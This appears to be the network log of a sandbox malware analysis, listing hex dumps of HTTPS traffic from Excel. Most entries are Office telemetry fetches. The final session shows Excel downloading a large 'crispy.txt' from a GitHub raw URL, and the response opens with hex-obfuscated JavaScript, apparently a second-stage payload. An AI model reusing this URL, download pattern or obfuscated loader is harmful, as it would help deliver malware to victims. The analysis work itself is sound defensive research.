                                                                                                                                                                                          2023-12-06 17:17:27 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 2c 20 69 6d 6d 75 74 61 62 6c 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4d 44 35 3a 20 68 61 31 65 65 69 69 7a 47 32 48 45 4a 6e 6a 4d 33 54 71 64 35 77 3d 3d 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 32 20 4e 6f 76 20 32 30 32 33 20 30 32 3a 31 34 3a 31 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 30 78 38 44 42 45 42 30 30 42 38 44 32 32 34 30 31 0d 0a 58 2d 43 61 63 68 65 3a 20 54 43 50 5f 48 49 54 0d 0a 78 2d 6d 73 2d 72 65 71 75 65 73 74 2d 69 64
                                                                                                                                                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: public, max-age=604800, immutableContent-Length: 606Content-Type: text/xmlContent-MD5: ha1eeiizG2HEJnjM3Tqd5w==Last-Modified: Wed, 22 Nov 2023 02:14:13 GMTETag: 0x8DBEB00B8D22401X-Cache: TCP_HITx-ms-request-id
                                                                                                                                                                                          2023-12-06 17:17:27 UTC606INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 33 32 34 30 30 36 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 45 78 74 65 6e 73 69 62 69 6c 69 74 79 2e 56 62 61 54 65 6c 65 6d 65 74 72 79 53 68 6f 77 49 64 65 22 20 41 54 54 3d 22 64 62 33 33 34 62 33 30 31 65 37 62 34 37 34 64 62 35 65 30 66 30 32 66 30 37 63 35 31 61 34 37 2d 61 31 62 35 62 63 33 36 2d 31 62 62 65 2d 34 38 32 66 2d 61 36 34 61 2d 63 32 64 39 63 62 36 30 36 37 30 36 2d 37 34 33 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 42 22 20 44 43 61 3d 22 44 43 20 50 53 50 20 50 53 55 22 20 78 6d 6c 6e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="324006" V="1" DC="SM" EN="Office.Extensibility.VbaTelemetryShowIde" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU" xmln


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          4192.168.2.164972813.107.219.404435188C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:17:27 UTC207OUTGET /rules/rule324005v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2023-12-06 17:17:27 UTC688INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 2c 20 69 6d 6d 75 74 61 62 6c 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4d 44 35 3a 20 54 55 54 4e 2b 6f 30 33 59 50 30 36 44 6b 71 57 48 4f 61 4e 6e 41 3d 3d 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 32 20 4e 6f 76 20 32 30 32 33 20 30 32 3a 31 34 3a 30 36 20 47 4d 54 0d 0a 45 54 61 67 3a 20 30 78 38 44 42 45 42 30 30 42 34 41 35 34 32 35 32 0d 0a 58 2d 43 61 63 68 65 3a 20 54 43 50 5f 48 49 54 0d 0a 78 2d 6d 73 2d 72 65 71 75 65 73 74 2d 69 64
                                                                                                                                                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: public, max-age=604800, immutableContent-Length: 606Content-Type: text/xmlContent-MD5: TUTN+o03YP06DkqWHOaNnA==Last-Modified: Wed, 22 Nov 2023 02:14:06 GMTETag: 0x8DBEB00B4A54252X-Cache: TCP_HITx-ms-request-id
                                                                                                                                                                                          2023-12-06 17:17:27 UTC606INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 33 32 34 30 30 35 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 45 78 74 65 6e 73 69 62 69 6c 69 74 79 2e 56 62 61 54 65 6c 65 6d 65 74 72 79 43 6f 6d 70 69 6c 65 22 20 41 54 54 3d 22 64 62 33 33 34 62 33 30 31 65 37 62 34 37 34 64 62 35 65 30 66 30 32 66 30 37 63 35 31 61 34 37 2d 61 31 62 35 62 63 33 36 2d 31 62 62 65 2d 34 38 32 66 2d 61 36 34 61 2d 63 32 64 39 63 62 36 30 36 37 30 36 2d 37 34 33 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 42 22 20 44 43 61 3d 22 44 43 20 50 53 50 20 50 53 55 22 20 78 6d 6c 6e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="324005" V="1" DC="SM" EN="Office.Extensibility.VbaTelemetryCompile" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU" xmln


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          5192.168.2.164973313.107.219.404435188C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:17:27 UTC207OUTGET /rules/rule324007v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2023-12-06 17:17:27 UTC688INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 2c 20 69 6d 6d 75 74 61 62 6c 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4d 44 35 3a 20 4e 68 78 48 6f 63 42 2b 56 39 65 35 61 2f 73 62 66 46 59 6f 47 77 3d 3d 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 32 20 4e 6f 76 20 32 30 32 33 20 30 32 3a 31 34 3a 31 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 30 78 38 44 42 45 42 30 30 42 38 43 39 32 34 39 44 0d 0a 58 2d 43 61 63 68 65 3a 20 54 43 50 5f 48 49 54 0d 0a 78 2d 6d 73 2d 72 65 71 75 65 73 74 2d 69 64
                                                                                                                                                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: public, max-age=604800, immutableContent-Length: 618Content-Type: text/xmlContent-MD5: NhxHocB+V9e5a/sbfFYoGw==Last-Modified: Wed, 22 Nov 2023 02:14:13 GMTETag: 0x8DBEB00B8C9249DX-Cache: TCP_HITx-ms-request-id
                                                                                                                                                                                          2023-12-06 17:17:27 UTC618INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 33 32 34 30 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 45 78 74 65 6e 73 69 62 69 6c 69 74 79 2e 56 62 61 54 65 6c 65 6d 65 74 72 79 49 64 65 4d 61 63 72 6f 52 75 6e 22 20 41 54 54 3d 22 64 62 33 33 34 62 33 30 31 65 37 62 34 37 34 64 62 35 65 30 66 30 32 66 30 37 63 35 31 61 34 37 2d 61 31 62 35 62 63 33 36 2d 31 62 62 65 2d 34 38 32 66 2d 61 36 34 61 2d 63 32 64 39 63 62 36 30 36 37 30 36 2d 37 34 33 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 42 22 20 44 43 61 3d 22 44 43 20 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="324007" V="1" DC="SM" EN="Office.Extensibility.VbaTelemetryIdeMacroRun" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          6192.168.2.164973213.107.219.404435188C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:17:27 UTC207OUTGET /rules/rule324008v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2023-12-06 17:17:27 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 2c 20 69 6d 6d 75 74 61 62 6c 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4d 44 35 3a 20 31 4e 2b 38 70 73 6d 66 31 4e 77 58 74 79 72 58 47 73 73 51 54 67 3d 3d 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 32 20 4e 6f 76 20 32 30 32 33 20 30 32 3a 31 34 3a 31 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 30 78 38 44 42 45 42 30 30 42 42 39 36 38 32 35 45 0d 0a 58 2d 43 61 63 68 65 3a 20 54 43 50 5f 48 49 54 0d 0a 78 2d 6d 73 2d 72 65 71 75 65 73 74 2d 69 64
                                                                                                                                                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: public, max-age=604800, immutableContent-Length: 614Content-Type: text/xmlContent-MD5: 1N+8psmf1NwXtyrXGssQTg==Last-Modified: Wed, 22 Nov 2023 02:14:18 GMTETag: 0x8DBEB00BB96825EX-Cache: TCP_HITx-ms-request-id
                                                                                                                                                                                          2023-12-06 17:17:27 UTC614INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 33 32 34 30 30 38 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 45 78 74 65 6e 73 69 62 69 6c 69 74 79 2e 56 62 61 54 65 6c 65 6d 65 74 72 79 48 6f 73 74 4d 61 63 72 6f 52 75 6e 22 20 41 54 54 3d 22 64 62 33 33 34 62 33 30 31 65 37 62 34 37 34 64 62 35 65 30 66 30 32 66 30 37 63 35 31 61 34 37 2d 61 31 62 35 62 63 33 36 2d 31 62 62 65 2d 34 38 32 66 2d 61 36 34 61 2d 63 32 64 39 63 62 36 30 36 37 30 36 2d 37 34 33 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 42 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="324008" V="1" DC="SM" EN="Office.Extensibility.VbaTelemetryHostMacroRun" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          7192.168.2.164973513.107.219.404435188C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:17:27 UTC206OUTGET /rules/rule63067v4s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2023-12-06 17:17:27 UTC689INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 2c 20 69 6d 6d 75 74 61 62 6c 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4d 44 35 3a 20 56 4d 37 31 65 32 42 69 4b 33 32 4d 47 51 56 2f 79 4d 48 49 44 51 3d 3d 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 31 34 3a 35 34 3a 30 31 20 47 4d 54 0d 0a 45 54 61 67 3a 20 30 78 38 44 42 45 34 35 38 35 46 39 39 34 37 32 45 0d 0a 58 2d 43 61 63 68 65 3a 20 54 43 50 5f 48 49 54 0d 0a 78 2d 6d 73 2d 72 65 71 75 65 73 74 2d 69
                                                                                                                                                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: public, max-age=604800, immutableContent-Length: 2871Content-Type: text/xmlContent-MD5: VM71e2BiK32MGQV/yMHIDQ==Last-Modified: Mon, 13 Nov 2023 14:54:01 GMTETag: 0x8DBE4585F99472EX-Cache: TCP_HITx-ms-request-i
                                                                                                                                                                                          2023-12-06 17:17:27 UTC2871INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 36 33 30 36 37 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 49 64 65 6e 74 69 74 79 2e 53 73 70 69 50 72 6f 6d 70 74 57 69 6e 33 32 22 20 41 54 54 3d 22 35 63 36 35 62 62 63 34 65 64 62 66 34 38 30 64 39 36 33 37 61 63 65 30 34 64 36 32 62 64 39 38 2d 31 32 38 34 34 38 39 33 2d 38 61 62 39 2d 34 64 64 65 2d 62 38 35 30 2d 35 36 31 32 63 62 31 32 65 30 66 32 2d 37 38 32 32 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="63067" V="4" DC="SM" EN="Office.Identity.SspiPromptWin32" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <S>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          8192.168.2.164973413.107.219.404435188C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:17:27 UTC207OUTGET /rules/rule324010v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2023-12-06 17:17:27 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 2c 20 69 6d 6d 75 74 61 62 6c 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4d 44 35 3a 20 6d 38 4a 63 77 35 50 7a 44 48 66 7a 58 54 51 56 5a 4b 47 68 37 77 3d 3d 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 32 20 4e 6f 76 20 32 30 32 33 20 30 32 3a 31 34 3a 30 39 20 47 4d 54 0d 0a 45 54 61 67 3a 20 30 78 38 44 42 45 42 30 30 42 36 37 30 37 30 43 31 0d 0a 58 2d 43 61 63 68 65 3a 20 54 43 50 5f 48 49 54 0d 0a 78 2d 6d 73 2d 72 65 71 75 65 73 74 2d 69 64
                                                                                                                                                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: public, max-age=604800, immutableContent-Length: 618Content-Type: text/xmlContent-MD5: m8Jcw5PzDHfzXTQVZKGh7w==Last-Modified: Wed, 22 Nov 2023 02:14:09 GMTETag: 0x8DBEB00B67070C1X-Cache: TCP_HITx-ms-request-id
                                                                                                                                                                                          2023-12-06 17:17:27 UTC618INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 33 32 34 30 31 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 45 78 74 65 6e 73 69 62 69 6c 69 74 79 2e 56 62 61 54 65 6c 65 6d 65 74 72 79 4d 61 63 72 6f 43 72 65 61 74 65 22 20 41 54 54 3d 22 64 62 33 33 34 62 33 30 31 65 37 62 34 37 34 64 62 35 65 30 66 30 32 66 30 37 63 35 31 61 34 37 2d 61 31 62 35 62 63 33 36 2d 31 62 62 65 2d 34 38 32 66 2d 61 36 34 61 2d 63 32 64 39 63 62 36 30 36 37 30 36 2d 37 34 33 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 42 22 20 44 43 61 3d 22 44 43 20 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="324010" V="1" DC="SM" EN="Office.Extensibility.VbaTelemetryMacroCreate" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          9192.168.2.164973113.107.219.404435188C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:17:27 UTC207OUTGET /rules/rule324009v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2023-12-06 17:17:27 UTC688INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 2c 20 69 6d 6d 75 74 61 62 6c 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4d 44 35 3a 20 53 50 43 66 44 79 4e 67 36 4f 4b 4a 79 6a 57 6c 69 79 47 67 6d 41 3d 3d 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 32 20 4e 6f 76 20 32 30 32 33 20 30 32 3a 31 34 3a 31 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 30 78 38 44 42 45 42 30 30 42 42 41 44 44 37 38 34 0d 0a 58 2d 43 61 63 68 65 3a 20 54 43 50 5f 48 49 54 0d 0a 78 2d 6d 73 2d 72 65 71 75 65 73 74 2d 69 64
                                                                                                                                                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: public, max-age=604800, immutableContent-Length: 618Content-Type: text/xmlContent-MD5: SPCfDyNg6OKJyjWliyGgmA==Last-Modified: Wed, 22 Nov 2023 02:14:18 GMTETag: 0x8DBEB00BBADD784X-Cache: TCP_HITx-ms-request-id
                                                                                                                                                                                          2023-12-06 17:17:27 UTC618INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 33 32 34 30 30 39 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 45 78 74 65 6e 73 69 62 69 6c 69 74 79 2e 56 62 61 54 65 6c 65 6d 65 74 72 79 4d 61 63 72 6f 52 65 63 6f 72 64 22 20 41 54 54 3d 22 64 62 33 33 34 62 33 30 31 65 37 62 34 37 34 64 62 35 65 30 66 30 32 66 30 37 63 35 31 61 34 37 2d 61 31 62 35 62 63 33 36 2d 31 62 62 65 2d 34 38 32 66 2d 61 36 34 61 2d 63 32 64 39 63 62 36 30 36 37 30 36 2d 37 34 33 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 42 22 20 44 43 61 3d 22 44 43 20 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="324009" V="1" DC="SM" EN="Office.Extensibility.VbaTelemetryMacroRecord" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU"


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          10192.168.2.1649736185.199.111.1334435188C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2023-12-06 17:18:01 UTC280OUTGET /mikecollines27288292/crispy-palm-tree/main/crispy.txt HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Accept-Language: en-ch
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                          Host: raw.githubusercontent.com
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2023-12-06 17:18:01 UTC893INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 33 32 36 31 39 32 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 33 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 73 74 79 6c 65 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 3b 20 73 61 6e 64 62 6f 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 45 54 61 67 3a 20 22 38 65 62 62 61 32 30 64 63 62 36 37 63 38 61 35 66 31 38 38 36 62 32 36 31 37 33 34 66 37 33 66 64 63 39 36 33
                                                                                                                                                                                          Data Ascii: HTTP/1.1 200 OKConnection: closeContent-Length: 3326192Cache-Control: max-age=300Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxContent-Type: text/plain; charset=utf-8ETag: "8ebba20dcb67c8a5f1886b261734f73fdc963
                                                                                                                                                                                          2023-12-06 17:18:01 UTC1378INData Raw: 74 72 79 7b 76 61 72 20 5a 54 56 48 44 48 4f 4b 41 4b 59 20 3d 20 c2 a3 22 5c 78 34 39 5c 78 34 38 5c 78 35 41 5c 78 36 38 5c 78 36 33 5c 78 36 39 5c 78 34 32 5c 78 34 45 5c 78 35 36 5c 78 33 31 5c 78 34 32 5c 78 35 39 5c 78 35 32 5c 78 35 3f 35 32 5c 78 35 33 5c 78 35 34 5c 78 35 36 5c 78 35 36 5c 78 34 45 5c 78 35 30 5c 78 35 36 5c 78 37 33 5c 78 36 39 5c 78 34 39 5c 78 36 39 5c 78 37 37 5c 78 36 39 5c 78 34 42 5c 78 36 42 5c 78 37 30 5c 78 34 45 5c 78 34 39 5c 78 35 37 5c 78 35 41 5c 78 34 39 5c 78 35 41 5c 78 35 34 5c 78 35 39 5c 78 37 34 5c 78 36 36 5c 78 36 43 5c 78 36 46 5c 78 37 30 5c 78 36 34 5c 78 34 38 5c 78 36 43 5c 78 32 36 5c 78 35 30 5c 78 32 33 5c 78 34 41 5c 78 36 42 5c 78 35 38 5c 78 36 41 5c 78 34 32 5c 78 36 46 5c 78 34 41 5c 78 35 37
                                                                                                                                                                                          Data Ascii: try{var ZTVHDHOKAKY = "\x49\x48\x5A\x68\x63\x69\x42\x4E\x56\x31\x42\x59\x52\x5?52\x53\x54\x56\x56\x4E\x50\x56\x73\x69\x49\x69\x77\x69\x4B\x6B\x70\x4E\x49\x57\x5A\x49\x5A\x54\x59\x74\x66\x6C\x6F\x70\x64\x48\x6C\x26\x50\x23\x4A\x6B\x58\x6A\x42\x6F\x4A\x57
